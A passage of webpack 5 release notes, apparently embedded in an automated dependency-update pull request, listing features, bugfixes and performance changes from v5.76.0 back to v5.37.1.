-   Fix HTML5 logo in README by [@&#8203;jakebailey](https://togithub.com/jakebailey) in [https://github.com/webpack/webpack/pull/16614](https://togithub.com/webpack/webpack/pull/16614)
-   Replace TypeScript logo in README by [@&#8203;jakebailey](https://togithub.com/jakebailey) in [https://github.com/webpack/webpack/pull/16613](https://togithub.com/webpack/webpack/pull/16613)
-   Update actions/cache dependencies by [@&#8203;piwysocki](https://togithub.com/piwysocki) in [https://github.com/webpack/webpack/pull/16493](https://togithub.com/webpack/webpack/pull/16493)

#### New Contributors

-   [@&#8203;Jack-Works](https://togithub.com/Jack-Works) made their first contribution in [https://github.com/webpack/webpack/pull/16500](https://togithub.com/webpack/webpack/pull/16500)
-   [@&#8203;lvivski](https://togithub.com/lvivski) made their first contribution in [https://github.com/webpack/webpack/pull/16491](https://togithub.com/webpack/webpack/pull/16491)
-   [@&#8203;jakebailey](https://togithub.com/jakebailey) made their first contribution in [https://github.com/webpack/webpack/pull/16614](https://togithub.com/webpack/webpack/pull/16614)
-   [@&#8203;akhilgkrishnan](https://togithub.com/akhilgkrishnan) made their first contribution in [https://github.com/webpack/webpack/pull/16446](https://togithub.com/webpack/webpack/pull/16446)
-   [@&#8203;ryanwilsonperkin](https://togithub.com/ryanwilsonperkin) made their first contribution in [https://github.com/webpack/webpack/pull/16703](https://togithub.com/webpack/webpack/pull/16703)
-   [@&#8203;piwysocki](https://togithub.com/piwysocki) made their first contribution in [https://github.com/webpack/webpack/pull/16493](https://togithub.com/webpack/webpack/pull/16493)
-   [@&#8203;askoufis](https://togithub.com/askoufis) made their first contribution in [https://github.com/webpack/webpack/pull/16781](https://togithub.com/webpack/webpack/pull/16781)

**Full Changelog**: https://github.com/webpack/webpack/compare/v5.75.0...v5.76.0

### [`v5.75.0`](https://togithub.com/webpack/webpack/releases/tag/v5.75.0)

[Compare Source](https://togithub.com/webpack/webpack/compare/v5.74.0...v5.75.0)

### Bugfixes

-   `experiments.*` normalize to `false` when opt-out
-   avoid `NaN%`
-   show the correct error when using a conflicting chunk name in code
-   HMR code tests existance of `window` before trying to access it
-   fix `eval-nosources-*` actually exclude sources
-   fix race condition where no module is returned from processing module
-   fix position of standalong semicolon in runtime code

### Features

-   add support for `@import` to extenal CSS when using experimental CSS in node
-   add `i64` support to the deprecated WASM implementation

### Developer Experience

-   expose `EnableWasmLoadingPlugin`
-   add more typings
-   generate getters instead of readonly properties in typings to allow overriding them

### [`v5.74.0`](https://togithub.com/webpack/webpack/releases/tag/v5.74.0)

[Compare Source](https://togithub.com/webpack/webpack/compare/v5.73.0...v5.74.0)

### Features

-   add `resolve.extensionAlias` option which allows to alias extensions
    -   This is useful when you are forced to add the `.js` extension to imports when the file really has a `.ts` extension (typescript + `"type": "module"`)
-   add support for ES2022 features like static blocks
-   add Tree Shaking support for `ProvidePlugin`

### Bugfixes

-   fix persistent cache when some build dependencies are on a different windows drive
-   make order of evaluation of side-effect-free modules deterministic between concatenated and non-concatenated modules
-   remove left-over from debugging in TLA/async modules runtime code
-   remove unneeded extra 1s timestamp offset during watching when files are actually untouched
    -   This sometimes caused an additional second build which are not really needed
-   fix `shareScope` option for `ModuleFederationPlugin`
-   set `"use-credentials"` also for same origen scripts

### Performance

-   Improve memory usage and performance of aggregating needed files/directories for watching
    -   This affects rebuild performance

### Extensibility

-   export `HarmonyImportDependency` for plugins

### [`v5.73.0`](https://togithub.com/webpack/webpack/releases/tag/v5.73.0)

[Compare Source](https://togithub.com/webpack/webpack/compare/v5.72.1...v5.73.0)

### Features

-   add options for default `dynamicImportMode` and prefetch and preload
-   add support for `import { createRequire } from "module"` in source code

### Bugfixes

-   fix code generation of e. g. `return"field"in Module`
-   fix performance of large JSON modules
-   fix performance of async modules evaluation

### Developer Experience

-   export `PathData` in typings
-   improve error messages with more details

### [`v5.72.1`](https://togithub.com/webpack/webpack/releases/tag/v5.72.1)

[Compare Source](https://togithub.com/webpack/webpack/compare/v5.72.0...v5.72.1)

### Bugfixes

-   fix `__webpack_nonce__` with HMR
-   fix `in` operator in some cases
-   fix json parsing error messages
-   fix module concatenation with using `this.importModule`
-   upgrade enhanced-resolve

### [`v5.72.0`](https://togithub.com/webpack/webpack/releases/tag/v5.72.0)

[Compare Source](https://togithub.com/webpack/webpack/compare/v5.71.0...v5.72.0)

### Features

-   make cache warnings caused by build errors less verbose
-   Allow banner to be placed as a footer with the BannerPlugin
-   allow to concatenate asset modules

### Bugfixes

-   fix RemoteModules when using HMR (Module Federation + HMR)
-   throw error when using module concatenation and cacheUnaffected
-   fix `in` operator with nested exports

### [`v5.71.0`](https://togithub.com/webpack/webpack/releases/tag/v5.71.0)

[Compare Source](https://togithub.com/webpack/webpack/compare/v5.70.0...v5.71.0)

### Features

-   choose smarter default for `uniqueName` when using a `output.library` which includes placeholders
-   add support for expressions with `in` of a imported binding
-   generate UMD code with arrow functions when possible

### Bugfixes

-   fix source map source names for ContextModule to be relative
-   fix `chunkLoading` option in module module
-   fix edge case where `evaluateExpression` returns `null`
-   retain optional chaining in imported bindings
-   include runtime code for the base URI even if not using chunk loading
-   don't throw errors in persistent caching when importing node.js builtin modules via ESM
-   fix crash when using `lazy-once` Context modules
-   improve handling of context modules with multiple contexts
-   fix race condition HMR chunk loading when importing chunks during HMR updating
-   handle errors in `runAsChild` callback

### [`v5.70.0`](https://togithub.com/webpack/webpack/releases/tag/v5.70.0)

[Compare Source](https://togithub.com/webpack/webpack/compare/v5.69.1...v5.70.0)

### Features

-   update node.js version constraints for ESM support
-   add `baseUri` to `entry` options to configure a static base uri (the base of `new URL()`)
-   alphabetically sort exports in namespace objects when possible
-   add `__webpack_exports_info__.name.canMangle`
-   add proxy support to `experiments.buildHttp`
-   `import.meta.webpackContext` as ESM alternative to `require.context`
-   handle multiple alternative directories (e. g. due to resolve.alias or resolve.modules) when creating an context module

### Bugfixes

-   fix problem when assigning `global` to a variable
-   fix crash when using `experiments.outputModule` and `loaderContext.importModule` with multiple chunks
-   avoid generating progress output before the compilation has started (ProgressPlugin)
-   fix handling of non-static-ESM dependencies with using TLA and HMR in the same module
-   include the asset module filename in hashing
-   `output.clean` will keep HMR assets for at least 10s to allow HMR to access them even when compilation is faster then the browser

### Performance

-   fix asset caching when using the BannerPlugin

### Developer Experience

-   improve typings

### Contributing

-   capture caching errors when running the test suite

### [`v5.69.1`](https://togithub.com/webpack/webpack/releases/tag/v5.69.1)

[Compare Source](https://togithub.com/webpack/webpack/compare/v5.69.0...v5.69.1)

### Revert

-   revert "handle multiple alternative directories (e. g. due to resolve.alias or resolve.modules) when creating an context module"

### [`v5.69.0`](https://togithub.com/webpack/webpack/releases/tag/v5.69.0)

[Compare Source](https://togithub.com/webpack/webpack/compare/v5.68.0...v5.69.0)

### Features

-   automatically switch to an ESM compatible environment when enabling ESM output mode
-   handle multiple alternative directories (e. g. due to `resolve.alias` or `resolve.modules`) when creating an context module
-   add `util/types` to node.js built-in modules
-   add `__webpack_exports_info__.<name>.canMangle` api

### Bugfixes

-   fix bug in chunk graph generation which leads to modules being included in chunk desprite them being already included in parent chunks
-   avoid writing more than 2GB at once during cache serialization (as workaround for node.js/libuv bug on MacOS)
-   fix handling of whitespaces in semver ranges when using Module Federation
-   avoid generating hashes which contain only numbers as they likely conflict with module ids
-   fix resource name based placeholders for data uris
-   fix cache serialization for context elements
-   fix passing of `stage` option when instrumenting plugins for the ProfilingPlugin
-   fix tracking of declarations in concatenated modules to avoid conflicts
-   fix unstable mangling of exports
-   fix handling of `#` in paths of loaders
-   avoid unnecessary cache update when using `experiments.buildHttp`

### Contributing

-   update typescript and jest

### Developer Experience

-   expose some additional typings for usage in webpack-cli

### [`v5.68.0`](https://togithub.com/webpack/webpack/releases/tag/v5.68.0)

[Compare Source](https://togithub.com/webpack/webpack/compare/v5.67.0...v5.68.0)

### Features

-   allow to disable compile time evaluation of import.meta.url
-   add `__webpack_module__` and `__webpack_module__.id` to the api

### Bugfixes

-   fix handling of errors thrown in async modules

### [`v5.67.0`](https://togithub.com/webpack/webpack/releases/tag/v5.67.0)

[Compare Source](https://togithub.com/webpack/webpack/compare/v5.66.0...v5.67.0)

### Features

-   add 'outputPath' configuration option for resource asset modules
-   support Trusted Types in eval source maps
-   `experiments.css`
    -   allow to generate only exports for css in node
    -   add `SyncModuleIdsPlugin` to sync module ids between server and client compilation
    -   add more options to the `DeterministicModuleIdsPlugin` to allow to generate equal ids

### Developer Experience

-   limit data url module name in stats printer
-   allow specific description for CLI options
-   improve space limiting algorithm in stats printing to show partial lists
-   add `null` to errors in callbacks
-   fix call signature types of addChunkInGroup

### Bugfixes

-   avoid reporting non-existant package.jsons as dependencies
-   `experiments.css`
    -   fix missing css runtime when only initial css is used
    -   fix css hmr support
    -   bugfixes to css modules
-   fix cache serialization for CreateScriptUrlDependency
-   fix data url content when processed by a loader
-   fix regexp in identifiers that include `|`
-   fix ProfilingPlugin for watch scenarios
-   add layer to module names and identifiers
    -   this avoid random module id changes when additional modules are added to another layer
-   provide hashFunction parameter to DependencyTemplates to allow customizing it there
-   fix HMR when experiments.lazyCompilation is enabled
-   store url as Buffer to avoid serialization warnings
-   exclude `webpack-hot-middleware/client` from lazy compilation

### Contributing

-   remove travis configuration
-   improve spell checking

### [`v5.66.0`](https://togithub.com/webpack/webpack/releases/tag/v5.66.0)

[Compare Source](https://togithub.com/webpack/webpack/compare/v5.65.0...v5.66.0)

### Features

-   add `output.library.type: "commonjs-static"` to emit a statically analyse-able commonjs module (for node.js esm interop support)
-   add `experiments.css` (very experimental)
    -   see [https://github.com/webpack/webpack/issues/14893](https://togithub.com/webpack/webpack/issues/14893)

### Bugfixes

-   fix CORS headers for `experiments.lazyCompilation`
-   fix `[absolute-resource-path]` for SourceMap module naming
-   avoid stack overflow when accessing many memory cached cache values in series

### Performance

-   reduce default `watchOptions.aggregateTimeout` to 20ms

### [`v5.65.0`](https://togithub.com/webpack/webpack/releases/tag/v5.65.0)

[Compare Source](https://togithub.com/webpack/webpack/compare/v5.64.4...v5.65.0)

### Features

-   static evaluation understands `undefined` now
-   reduce container entry code by a few chars
-   use template literals when available and they make sense

### Bugfixes

-   handle `singleton` flag without `requiredVersion` in Module Federation
-   upgrade `watchpack` for context time info bugfix

### Performance

-   improve RegExp in error message formating for non-quadratic performance

### Developer Experience

-   automatically insert brackets when `output.globalObject` contains a non-trival expression
-   show error when using `script` type external with invalid syntax
-   expose types for `Resolver`, `StatsOptions` and `ResolvePluginInstance`

### Preparations for the future

-   `hashDigestLength` will default to 16 in webpack 6 (`experiments.futureDefaults`)

### [`v5.64.4`](https://togithub.com/webpack/webpack/releases/tag/v5.64.4)

[Compare Source](https://togithub.com/webpack/webpack/compare/v5.64.3...v5.64.4)

### Bugfixes

-   fix tagged template literal evaluation
-   fix ModuleFederation with ESM
-   fix outputModule with intial splitChunks

### Performance

-   upgrade watchpack for faster watcher updating
-   track file and directory timestamps separately in watchpack and webpack

### Developer Experience

-   show origen of singleton shared module in mismatch warning

### [`v5.64.3`](https://togithub.com/webpack/webpack/releases/tag/v5.64.3)

[Compare Source](https://togithub.com/webpack/webpack/compare/v5.64.2...v5.64.3)

### Performance

-   allow to use pre-compiled schema when `Infinity` is used in configuration
-   allow to use pre-compiled schema for configuration arrays

### [`v5.64.2`](https://togithub.com/webpack/webpack/releases/tag/v5.64.2)

[Compare Source](https://togithub.com/webpack/webpack/compare/v5.64.1...v5.64.2)

### Bugfixes

-   avoid double initial compilation due to invalid dependencies with managedPaths

### [`v5.64.1`](https://togithub.com/webpack/webpack/releases/tag/v5.64.1)

[Compare Source](https://togithub.com/webpack/webpack/compare/v5.64.0...v5.64.1)

### Bugfixes

-   fix regexp in managedPaths to exclude additional slash
-   make module.accept errorHandler optional in typings
-   correctly create an async chunk when using a `require(...).property` in `require.ensure`
-   fix cleaning of symlinks in `output.clean: true`
-   fix change detection with `unsafeCache` within `managedPaths` (node_modules)
-   bump webpack-sources for Stack Overflow bugfix

### [`v5.64.0`](https://togithub.com/webpack/webpack/releases/tag/v5.64.0)

[Compare Source](https://togithub.com/webpack/webpack/compare/v5.63.0...v5.64.0)

### Features

-   add `asyncChunks: boolean` option to disable creation of async chunks

### Bugfixes

-   fix ProfilingPlugin for `experiments.backCompat: false`

### Performance

-   avoid running regexp twice over the file list

### [`v5.63.0`](https://togithub.com/webpack/webpack/releases/tag/v5.63.0)

[Compare Source](https://togithub.com/webpack/webpack/compare/v5.62.2...v5.63.0)

### Features

-   allow passing `chunkLoading: false` to disable on-demand loading

### Bugfixes

-   fix `import 'single-quote'` in esm build dependencies

### [`v5.62.2`](https://togithub.com/webpack/webpack/releases/tag/v5.62.2)

[Compare Source](https://togithub.com/webpack/webpack/compare/v5.62.1...v5.62.2)

### Bugfixes

-   fix `__system_context__` injection when using the `library` option on entrypoint
-   enable `exportsPresence: "error"` by default in `futureDefaults`
-   fix bad performance for a RegExp in Stats printing (with large error messages)
-   fix `exportPresence` -> `exportsPresence` typo
-   fix a bug with module invalidation when only module id changes with `experiments.cacheUnaffected`

### [`v5.62.1`](https://togithub.com/webpack/webpack/releases/tag/v5.62.1)

[Compare Source](https://togithub.com/webpack/webpack/compare/v5.62.0...v5.62.1)

### Bugfix

-   fix invalid generated code when omitting `;`

### [`v5.62.0`](https://togithub.com/webpack/webpack/releases/tag/v5.62.0)

[Compare Source](https://togithub.com/webpack/webpack/compare/v5.61.0...v5.62.0)

### Features

-   add options to configure export presence checking
    -   `parser.javascript.reexportExportsPresence: false` allows to disable warnings for non-existing exports during the migration from `export ... from "..."` to `export type ... from "..."` for type reexports in TypeScript
-   add `experiments.backCompat: false` to disable some expensive deprecations for better performance

### Bugfixes

-   use `['catch']` instead of `.catch` for better ES3 support
-   fix removed parentheses when using `new (require("...")).Something()`
-   fix `{ require }` object literals
-   `splitChunks.chunks` option is now correctly used for `splitChunks.fallbackCacheGroup.maxSize` too
-   fix schema of `listen` option, allow to omit `port`
-   add better support for Promises from different isolates

### Developer Experience

-   add typings for the webpack API that is available within modules
    -   use `//redirect.github.com/ <reference types="webpack/module" />` to use the typings in typescript modules
    -   or `"types": [..., "webpack/module"]` in tsconfig

### [`v5.61.0`](https://togithub.com/webpack/webpack/releases/tag/v5.61.0)

[Compare Source](https://togithub.com/webpack/webpack/compare/v5.60.0...v5.61.0)

### Bugfixes

-   use a wasm md4 implementation for node 17 support
-   include the `path` submodules in the node.js default externals

### Performance

-   improve string to binary conversion performance for hashing

### Contribution

-   CI runs on node.js 17

### [`v5.60.0`](https://togithub.com/webpack/webpack/releases/tag/v5.60.0)

[Compare Source](https://togithub.com/webpack/webpack/compare/v5.59.1...v5.60.0)

### Features

-   Allow to pass more options to `experiments.lazyCompilation`. e. g. port, https stuff

### Bugfixes

-   fix `output.hashFunction` used to persistent caching too
-   Initialize `buildDependencies` Set correctly when loaders are added in `beforeLoaders` hook

### [`v5.59.1`](https://togithub.com/webpack/webpack/releases/tag/v5.59.1)

[Compare Source](https://togithub.com/webpack/webpack/compare/v5.59.0...v5.59.1)

### Bugfixes

-   fix regexp in managedPaths
-   fix hanging when trying to write lockfile for `experiments.buildHttp`

### [`v5.59.0`](https://togithub.com/webpack/webpack/releases/tag/v5.59.0)

[Compare Source](https://togithub.com/webpack/webpack/compare/v5.58.2...v5.59.0)

### Features

-   add `/*#__PURE__*/` for `Object()` in generated code
-   add RegExp and function support for `managed/immutablePaths`
-   add hooks for multiple phases in module build
-   improvements to `experiments.buildHttp`
    -   allow to share cache
    -   add allowlist
-   add `splitChunks.minSizeReduction` option

### Bugfixes

-   fix memory caching for Data URLs
-   fix crash in `waitFor` when modules are unsafe cached
-   fix bug in build cycle detection

### [`v5.58.2`](https://togithub.com/webpack/webpack/releases/tag/v5.58.2)

[Compare Source](https://togithub.com/webpack/webpack/compare/v5.58.1...v5.58.2)

### Bugfixes

-   fix serialization context passed
-   fix a bug which caused module duplication when using persistent caching, unsafe cache and memory cache with GC
-   fix validation of snapshots of non-existing directories

### Performance

-   store a hash in first bits of bigint to workaround v8 hashing: https://github.com/v8/v8/blob/b704bc0958e2e26305a68e89d215af1aee011148/src/objects/bigint.h#L192-L195

### [`v5.58.1`](https://togithub.com/webpack/webpack/releases/tag/v5.58.1)

[Compare Source](https://togithub.com/webpack/webpack/compare/v5.58.0...v5.58.1)

### Bugfixes

-   fix `.webpack[]` suffix to not execute rules
-   revert performance optimization that has too large memory usage in large builds

### [`v5.58.0`](https://togithub.com/webpack/webpack/releases/tag/v5.58.0)

[Compare Source](https://togithub.com/webpack/webpack/compare/v5.57.1...v5.58.0)

### Features

-   add hook for readResource
-   add `diagnostics_channel` to node builtins

### Performance

-   improve chunk graph creation performance
    -   add cacheUnaffected cache support
-   remove some caching that makes not difference
-   improve splitChunks performance
-   improve chunk conditions performance

### [`v5.57.1`](https://togithub.com/webpack/webpack/releases/tag/v5.57.1)

[Compare Source](https://togithub.com/webpack/webpack/compare/v5.57.0...v5.57.1)

### Bugfix

-   fix experiments.cacheUnaffected which broke by last release

### [`v5.57.0`](https://togithub.com/webpack/webpack/releases/tag/v5.57.0)

[Compare Source](https://togithub.com/webpack/webpack/compare/v5.56.1...v5.57.0)

### Performance

-   reduce number of hash.update calls
-   allow ExternalModules to be unsafe cached
-   improve hashing performance of module lists (StringXor)

### Bugfixes

-   experiments.cacheUnaffected
    -   handle module/chunk id changes correctly
    -   cache modules with async blocks
    -   show errors when using incompatible options

### [`v5.56.1`](https://togithub.com/webpack/webpack/releases/tag/v5.56.1)

[Compare Source](https://togithub.com/webpack/webpack/compare/v5.56.0...v5.56.1)

### Bugfix

-   DefinePlugin: fix conflict with older variants of the plugin

### [`v5.56.0`](https://togithub.com/webpack/webpack/releases/tag/v5.56.0)

[Compare Source](https://togithub.com/webpack/webpack/compare/v5.55.1...v5.56.0)

### Performance

-   make DefinePlugin rebuild check more efficient performance and memory wise

### [`v5.55.1`](https://togithub.com/webpack/webpack/releases/tag/v5.55.1)

[Compare Source](https://togithub.com/webpack/webpack/compare/v5.55.0...v5.55.1)

### Bugfixes

-   fixes for `experiments.cacheUnaffected`
    -   fix accidentically shared mem caches
    -   avoid RuntimeSpecMap in favor of directly setting on memCache
    -   compare references modules when restoring mem cache

### [`v5.55.0`](https://togithub.com/webpack/webpack/releases/tag/v5.55.0)

[Compare Source](https://togithub.com/webpack/webpack/compare/v5.54.0...v5.55.0)

### Performance

-   `experiments.cacheUnaffected`
    -   reduce cache memory usage
    -   make memCache per module
    -   cache ESM reexport computation
-   `module.unsafeCache`
    -   make it faster by moving it to Compilation-level instead of in NormalModuleFactory
    -   omit tracking resolve dependencies since they are not used when unsafe cache is enabled
-   module graph
    -   lazy assign ModuleGraphConnections to Dependencies since that is only accessed when uncached

### [`v5.54.0`](https://togithub.com/webpack/webpack/releases/tag/v5.54.0)

[Compare Source](https://togithub.com/webpack/webpack/compare/v5.53.0...v5.54.0)

### Features

-   improve constant folding to allow to skip more branches for `&&` `||` and `??`
-   allow all hashing using in webpack to be configured with `output.hashFunction`
-   no longer bailout completely from inner graph analysis when `eval` is used in a module

### Bugfixes

-   force bump enhanced-resolve for bugfixes

### Performance

-   reduce number of allocation when creating snapshots
-   add `output.hashFunction: "xxhash64"` for a super fast wasm based hash function
-   improve utf-8 conversion when serializing short strings
-   improve hashing performance for dependencies
-   add `experiments.cacheUnaffected` which caches computations for modules that are unchanged and reference only unchanged modules

### [`v5.53.0`](https://togithub.com/webpack/webpack/releases/tag/v5.53.0)

[Compare Source](https://togithub.com/webpack/webpack/compare/v5.52.1...v5.53.0)

### Features

-   add `node.__dirname/__filename: "warn-mock"` which warns on usage (will be enabled in webpack 6 by default)

### Bugfixes

-   add `stream/web` to Node.js externals
-   fix IgnorePluginSchema
-   fix builds with persistent caching taking 1 minute to build at least

### Experiments

-   add `experiments.futureDefaults` to enable defaults for webpack 6

### [`v5.52.1`](https://togithub.com/webpack/webpack/releases/tag/v5.52.1)

[Compare Source](https://togithub.com/webpack/webpack/compare/v5.52.0...v5.52.1)

### Performance

-   split fresh created persistent cache files by time to avoid creating very large files

### [`v5.52.0`](https://togithub.com/webpack/webpack/releases/tag/v5.52.0)

[Compare Source](https://togithub.com/webpack/webpack/compare/v5.51.2...v5.52.0)

### Feature

-   `experiments.executeModule` is enabled by default and the option is removed
    -   loaders are now free to use `this.importModule`

### Bugfixes

-   fix generated `__WEBPACK_EXTERNAL_MODULE_null__`, which leads to merged externals
-   `.webpack[...]` extension is not part of matching and module name

### [`v5.51.2`](https://togithub.com/webpack/webpack/releases/tag/v5.51.2)

[Compare Source](https://togithub.com/webpack/webpack/compare/v5.51.1...v5.51.2)

### Bugfixes

-   fix crash in FileSystemInfo when errors occur
-   avoid property access of reserved properties
-   fix reexports from async modules
-   automatically close an active watching when closing the compiler
-   when filenames of other runtimes are referenced that need a full hash, upgrade referencing runtime moduel to full hash mode too
    -   fixes a bug where `[contenthash]` is undefined when using `new Worker`

### [`v5.51.1`](https://togithub.com/webpack/webpack/releases/tag/v5.51.1)

[Compare Source](https://togithub.com/webpack/webpack/compare/v5.51.0...v5.51.1)

### Bugfixes

-   `library: "module"` propages top-level-await correctly
-   fix crash in filesystem snapshotting when trying to snapshot a non-existing directory
-   fix some context-dependent logic in concatenated modules and source url handling

### [`v5.51.0`](https://togithub.com/webpack/webpack/releases/tag/v5.51.0)

[Compare Source](https://togithub.com/webpack/webpack/compare/v5.50.0...v5.51.0)

### Bugfixes

-   correctly keep chunk loading state when the chunk loading logic is HMR updated
    -   This fixes some edge cases that e. g. occur when using lazy compilation for entrypoints. It is now able to HMR update that instead of needing a manual reload. Also see fixes in webpack-dev-server@4.
-   track and resolve symlinks for filesystem snapshotting
    -   This fixes some cases of circular `yarn link`ing of dependencies.
    -   It also fixes some problems when using package managers that use symlinks to deduplicate (e. g. cnpm or pnpm)
-   pass the resulting module in the callbacks of `Compilation.addModuleChain` and `Compilation.addModuleTree`

### [`v5.50.0`](https://togithub.com/webpack/webpack/releases/tag/v5.50.0)

[Compare Source](https://togithub.com/webpack/webpack/compare/v5.49.0...v5.50.0)

### Features

-   hashbangs (`#! ...`) are now handled by webpack
    -   https://github.com/tc39/proposal-hashbang

### Performance

-   disable cache compression by default as it tend to make performance worse
    -   I could still be enabled again for specific scenarios
-   reduce the number of allocations during cache serialization
    -   This improves performance and memory usage

### [`v5.49.0`](https://togithub.com/webpack/webpack/releases/tag/v5.49.0)

[Compare Source](https://togithub.com/webpack/webpack/compare/v5.48.0...v5.49.0)

### Features

-   add `experiments.buildHttp` to build `http(s)://` imports instead of keeping them external
    -   keeps a `webpack.lock` file with integrity and `webpack.lock.data` with cached content that should be committed
    -   Automatically upgrades lockfile during development when remote resources change
        (might be disabled with `experiments.buildHttp.upgrade: false`)
    -   Lockfile is frozen during production builds and usually no network requests are made
        (exception: `Cache-Control: no-cache`).
    -   The `webpack.lock.data` persisting can be disabled with `experiments.buildHttp.cacheLocation: false`.
        That will will introduce a availability risk.
        (webpack cache will be used to cache network responses)

### Bugfixes

-   fix HMR infinite loop (again)
-   fix rare non-determinism with `splitChunks.maxSize` introduces in the last release
-   optional modules no longer cause the module to fail when `bail` is set
-   fix typo in records format: chunkHashs -> chunkHashes

### Performance

-   limit the number of parallel generated chunks for memory reasons

### [`v5.48.0`](https://togithub.com/webpack/webpack/releases/tag/v5.48.0)

[Compare Source](https://togithub.com/webpack/webpack/compare/v5.47.1...v5.48.0)

### Features

-   enable import assertions again

### Bugfixes

-   upgrade webpack-sources for fixes regarding source maps
-   fix infinite loop in HMR runtime code

### [`v5.47.1`](https://togithub.com/webpack/webpack/releases/tag/v5.47.1)

[Compare Source](https://togithub.com/webpack/webpack/compare/v5.47.0...v5.47.1)

### Bugfixes

-   upgrade webpack-sources for a bunch of bugfixes regarding source maps and missing chars in output

### [`v5.47.0`](https://togithub.com/webpack/webpack/releases/tag/v5.47.0)

[Compare Source](https://togithub.com/webpack/webpack/compare/v5.46.0...v5.47.0)

### Performance

-   improve source-map performance

### Bugfixes

-   avoid unnecessary `"use strict"`s in module mode

### [`v5.46.0`](https://togithub.com/webpack/webpack/releases/tag/v5.46.0)

[Compare Source](https://togithub.com/webpack/webpack/compare/v5.45.1...v5.46.0)

### Features

-   status handlers in HMR api can now return Promises to delay the HMR process
-   reasons in stats can now be grouped and collapsed
    -   add `stats.reasonsSpace` and `stats.groupReasonsByOrigin`

### Bugfixes

-   fix a crash in asset modules when updating persistent cached modules from unsafe cached modules

### Performance

-   detailed preset limits all spaces to 1000 by default
-   upgrade webpack-sources for a performance bugfix

### [`v5.45.1`](https://togithub.com/webpack/webpack/releases/tag/v5.45.1)

[Compare Source](https://togithub.com/webpack/webpack/compare/v5.45.0...v5.45.1)

### Bugfixes

-   temporary revert import assertions because parser changes break the word `assert` in other places
-   `import(/* webpackPrefetch: true */ ...)` no longer breaks library output
-   DataURL tries to avoid re-encoding
-   fix problems with DataURL encoding in some cases

### [`v5.45.0`](https://togithub.com/webpack/webpack/releases/tag/v5.45.0)

[Compare Source](https://togithub.com/webpack/webpack/compare/v5.44.0...v5.45.0)

### Features

-   add support to import assertions

### Bugfixes

-   SourceMaps will now also be added to `.cjs` output files
-   fix non-system externals in a system library

### Performance

-   avoid copying timestamps from the watcher to the compiler

### Contributing

-   update to jest 27

### [`v5.44.0`](https://togithub.com/webpack/webpack/releases/tag/v5.44.0)

[Compare Source](https://togithub.com/webpack/webpack/compare/v5.43.0...v5.44.0)

### Features

-   add support for `output.module` + `optimization.runtimeChunk`

### Bugfixes

-   fix inline externals with dash in type

### [`v5.43.0`](https://togithub.com/webpack/webpack/releases/tag/v5.43.0)

[Compare Source](https://togithub.com/webpack/webpack/compare/v5.42.1...v5.43.0)

### Features

-   support `runtime: false` in entry description to disable runtime chunk
-   support `runtime` option in ModuleFederationPlugin and ContainerPlugin

### Bugfixes

-   fix `"module"` externals when concatenated

### Performance

-   serialize JSON data as buffer and parse on demand for performance and to avoid performance warning

### [`v5.42.1`](https://togithub.com/webpack/webpack/releases/tag/v5.42.1)

[Compare Source](https://togithub.com/webpack/webpack/compare/v5.42.0...v5.42.1)

### Bugfixes

-   fix crashes when rebuilding with `jsonData` or `dataUrl` of undefined

### [`v5.42.0`](https://togithub.com/webpack/webpack/releases/tag/v5.42.0)

[Compare Source](https://togithub.com/webpack/webpack/compare/v5.41.1...v5.42.0)

### Features

-   add cache compression via `cache.compression`
-   enable cache compression by default for non-development modes

### Bugfixes

-   add `node-commonjs` to schema for `externalsType`
-   update acorn to fix problems with top level await
-   fix regression for `system` externals

### Performance

-   fix a memory leak in the unsafe cache

### [`v5.41.1`](https://togithub.com/webpack/webpack/releases/tag/v5.41.1)

[Compare Source](https://togithub.com/webpack/webpack/compare/v5.41.0...v5.41.1)

### Bugfixes

-   add missing types about experimental esm support to schema
-   avoid slicing large Buffers as that doesn't always work for unknown reasons

### Performance

-   avoid slicing Buffers unnecessarily

### [`v5.41.0`](https://togithub.com/webpack/webpack/releases/tag/v5.41.0)

[Compare Source](https://togithub.com/webpack/webpack/compare/v5.40.0...v5.41.0)

### Features

-   Persist cache faster when large changes are detected
    -   new option `cache.idleTimeoutAfterLargeChanges` to control that

### Bugfixes

-   shutdown lazy compilation server correctly

### Experiments

-   EcmaScript modules support (`experiments.outputModule: true`)
    -   `output.library.type: "module"`: very basic support, no live bindings, unnecessary runtime code
    -   `output.chunkLoading: "import"`
    -   `output.chunkFormat: "module"`
    -   `externalsType: "module"` generates now `import * as X from "..."` (in a module) or `import("...")` (in a script)
    -   Node.js commonjs externals use `import { createRequire } from "module"` in a module
    -   `new Worker` etc. sets \`type: "module"

### [`v5.40.0`](https://togithub.com/webpack/webpack/releases/tag/v5.40.0)

[Compare Source](https://togithub.com/webpack/webpack/compare/v5.39.1...v5.40.0)

### Features

-   accept `node:` prefixed requests as node.js externals
-   avoid `instanceof Promise` in favor of `p && typeof p.then === "function"` to allow mixing different Promise implementions

### Bugfixes

-   fix usage analysis of class properties

### Performance

-   improve LazySet memory usage by shortcircuiting empty sets
-   reduce algorithmic complexity of the structure analysis for plain objects serialization

### Developer Experience

-   allow `Buffer` in `this.emitFile` typings (loader context)
-   improve `reset` cli argument description

### [`v5.39.1`](https://togithub.com/webpack/webpack/releases/tag/v5.39.1)

[Compare Source](https://togithub.com/webpack/webpack/compare/v5.39.0...v5.39.1)

### Bugfixes

-   reduce memory usage and fix memory leaks

### [`v5.39.0`](https://togithub.com/webpack/webpack/releases/tag/v5.39.0)

[Compare Source](https://togithub.com/webpack/webpack/compare/v5.38.1...v5.39.0)

### Features

-   allow lazy compilation for `import()` context (import with expression)

### Bugfixes

-   fix respecting `cache.allowCollectingMemory`
-   fix cli loading after installing it
-   fix initial list of non-js chunks that are flagged as already loaded

### Performance

-   remove unnecessary `Error.captureStackTrace` from webpack errors

### [`v5.38.1`](https://togithub.com/webpack/webpack/releases/tag/v5.38.1)

[Compare Source](https://togithub.com/webpack/webpack/compare/v5.38.0...v5.38.1)

### Performance

-   fix missing increment in sorting optimization from last release

### [`v5.38.0`](https://togithub.com/webpack/webpack/releases/tag/v5.38.0)

[Compare Source](https://togithub.com/webpack/webpack/compare/v5.37.1...v5.38.0)

### Features

-   `new URL("data:...", import.meta.url)` is now supported
-   add `module.rules[].scheme` as condition to match the request scheme (like `data`, `http`, etc.)

### Bugfixes

-   fix tracking of changes and removals during watching in some edge cases
-   fix incorrect renaming of class fields in concatenatenated modules
-   fix crash in HMR when removing runtimes from the compilation

### Performance

-   lazy import some internal modules only when used
-   allow unsafe caching of the entrypoint
-   improve performance of sorting exports info map
-   update to latest webpack-sources for improved source map performance

### [`v5.37.1`](https://togithub.com/webpack/webpack/releases/tag/v5.37.1)

